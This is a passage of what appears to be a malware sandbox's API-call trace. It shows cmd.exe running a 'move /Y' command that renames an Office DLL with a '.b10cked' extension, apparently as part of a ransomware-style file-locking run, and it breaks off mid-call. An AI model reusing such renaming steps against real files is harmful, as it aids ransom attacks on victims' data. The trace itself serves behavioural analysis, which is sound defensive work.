1 [0157.103] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af824 | out: phkResult=0x2af824*=0x0) returned 0x2 [0157.103] VirtualQuery (in: lpAddress=0x2af85b, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.103] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0157.103] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0157.103] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.103] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af7f4, dwLength=0x1c | out: lpBuffer=0x2af7f4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0157.103] GetConsoleOutputCP () returned 0x1b5 [0157.103] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.103] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0157.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.103] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0157.103] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.103] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0157.104] _get_osfhandle (_FileHandle=1) returned 0x7 [0157.104] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0157.104] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.104] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0157.104] _get_osfhandle (_FileHandle=0) returned 0x3 [0157.104] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0157.104] GetEnvironmentStringsW () returned 0x430210* [0157.104] FreeEnvironmentStringsW (penv=0x430210) returned 1 [0157.104] GetEnvironmentStringsW () returned 0x430210* [0157.104] FreeEnvironmentStringsW (penv=0x430210) returned 1 [0157.104] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae794 | out: phkResult=0x2ae794*=0x40) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0xa0, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x1, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x1, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x0, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x40, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x40, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x40, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegCloseKey (hKey=0x40) returned 0x0 [0157.105] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae794 | out: phkResult=0x2ae794*=0x40) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x40, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x1, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x1, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x0, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x9, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x4, lpData=0x2ae7a0*=0x9, lpcbData=0x2ae798*=0x4) returned 0x0 [0157.105] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae79c, lpData=0x2ae7a0, lpcbData=0x2ae798*=0x1000 | out: lpType=0x2ae79c*=0x0, lpData=0x2ae7a0*=0x9, lpcbData=0x2ae798*=0x1000) returned 0x2 [0157.105] RegCloseKey (hKey=0x40) returned 0x0 [0157.105] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637f [0157.105] srand (_Seed=0x5b88637f) [0157.105] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"" [0157.105] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"" [0157.106] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.106] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x431970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0157.106] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0157.106] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0157.106] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.106] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0157.106] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0157.106] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0157.106] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0157.106] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0157.106] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0157.106] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0157.106] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0157.106] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0157.106] GetEnvironmentStringsW () returned 0x432360* [0157.106] FreeEnvironmentStringsW (penv=0x432360) returned 1 [0157.107] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.107] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0157.107] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0157.107] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0157.107] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0157.107] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0157.107] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0157.107] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0157.107] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0157.107] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0157.107] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af560 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.107] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af560, lpFilePart=0x2af55c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af55c*="Desktop") returned 0x18 [0157.107] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.107] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af2dc | out: lpFindFileData=0x2af2dc) returned 0x4309f0 [0157.107] FindClose (in: hFindFile=0x4309f0 | out: hFindFile=0x4309f0) returned 1 [0157.107] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af2dc | out: lpFindFileData=0x2af2dc) returned 0x4309f0 [0157.107] FindClose (in: hFindFile=0x4309f0 | out: hFindFile=0x4309f0) returned 1 [0157.108] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af2dc | out: lpFindFileData=0x2af2dc) returned 0x4309f0 [0157.108] FindClose (in: hFindFile=0x4309f0 | out: hFindFile=0x4309f0) returned 1 [0157.108] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0157.108] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0157.108] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0157.108] GetEnvironmentStringsW () returned 0x430210* [0157.108] FreeEnvironmentStringsW (penv=0x430210) returned 1 [0157.108] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.109] GetConsoleOutputCP () returned 0x1b5 [0157.109] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0157.109] GetUserDefaultLCID () returned 0x409 [0157.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af6a0, cchData=128 | out: lpLCData="0") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af6a0, cchData=128 | out: lpLCData="0") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af6a0, cchData=128 | out: lpLCData="1") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0157.110] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0157.110] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0157.111] GetConsoleTitleW (in: lpConsoleTitle=0x420930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0157.111] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0157.111] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0157.111] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0157.112] _wcsicmp (_String1="move", _String2=")") returned 68 [0157.112] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0157.112] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0157.112] _wcsicmp (_String1="IF", _String2="move") returned -4 [0157.112] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0157.113] _wcsicmp (_String1="REM", _String2="move") returned 5 [0157.113] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0157.117] GetConsoleTitleW (in: lpConsoleTitle=0x2af398, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0157.117] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0157.117] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0157.117] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0157.117] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0157.117] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0157.117] _wcsicmp (_String1="move", _String2="CD") returned 10 [0157.117] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0157.117] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0157.118] _wcsicmp (_String1="move", _String2="REN") returned -5 [0157.118] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0157.118] _wcsicmp (_String1="move", _String2="SET") returned -6 [0157.118] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0157.118] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0157.118] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0157.118] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0157.118] _wcsicmp (_String1="move", _String2="MD") returned 11 [0157.118] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0157.118] _wcsicmp (_String1="move", _String2="RD") returned -5 [0157.118] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0157.118] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0157.118] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0157.118] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0157.118] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0157.118] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0157.118] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0157.118] _wcsicmp (_String1="move", _String2="VER") returned -9 [0157.118] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0157.118] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0157.118] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0157.118] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0157.118] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0157.118] _wcsicmp (_String1="move", _String2="START") returned -6 [0157.118] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0157.118] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0157.118] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0157.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.120] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.120] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af154, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af14c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af14c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0157.121] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0157.122] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0157.122] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0157.122] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0157.122] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0157.122] _wcsicmp (_String1="OUTLWV~1.TRX", _String2=".") returned 65 [0157.122] _wcsicmp (_String1="OUTLWV~1.TRX", _String2="..") returned 65 [0157.122] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwv~1.trx")) returned 0x2020 [0157.434] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x431f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0157.434] SetErrorMode (uMode=0x0) returned 0x0 [0157.434] SetErrorMode (uMode=0x1) returned 0x0 [0157.434] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", nBufferLength=0x104, lpBuffer=0x2aeadc, lpFilePart=0x2aeac4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", lpFilePart=0x2aeac4*="OUTLWV~1.TRX") returned 0x3c [0157.434] SetErrorMode (uMode=0x0) returned 0x1 [0157.434] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0157.434] _wcsicmp (_String1="OUTLWV~1.TRX", _String2=".") returned 65 [0157.434] _wcsicmp (_String1="OUTLWV~1.TRX", _String2="..") returned 65 [0157.434] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwv~1.trx")) returned 0x2020 [0157.435] SetErrorMode (uMode=0x0) returned 0x0 [0157.435] SetErrorMode (uMode=0x1) returned 0x0 [0157.435] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", nBufferLength=0x104, lpBuffer=0x2aef58, lpFilePart=0x2aecf0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", lpFilePart=0x2aecf0*="OUTLWV~1.TRX") returned 0x3c [0157.435] SetErrorMode (uMode=0x0) returned 0x1 [0157.435] SetErrorMode (uMode=0x0) returned 0x0 [0157.435] SetErrorMode (uMode=0x1) returned 0x0 [0157.435] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2af160, lpFilePart=0x2aecf0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked", lpFilePart=0x2aecf0*="OUTLWVW.DLL.trx_dll.b10cked") returned 0x4b [0157.435] SetErrorMode (uMode=0x0) returned 0x1 [0157.435] SetLastError (dwErrCode=0x0) [0157.435] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwvw.dll.trx_dll.b10cked")) returned 0xffffffff [0157.435] GetLastError () returned 0x2 [0157.435] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ae66c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae66c) returned 0x432130 [0157.436] FindNextFileW (in: hFindFile=0x432130, lpFindFileData=0x2ae66c | out: lpFindFileData=0x2ae66c) returned 0 [0157.436] GetLastError () returned 0x12 [0157.436] FindClose (in: hFindFile=0x432130 | out: hFindFile=0x432130) returned 1 [0157.438] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x431cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x431cc0) returned 0x432130 [0157.439] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ae904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0157.439] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2ae904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0157.439] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\outlwvw.dll.trx_dll")) returned 0x2020 [0157.440] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll" (normalized: 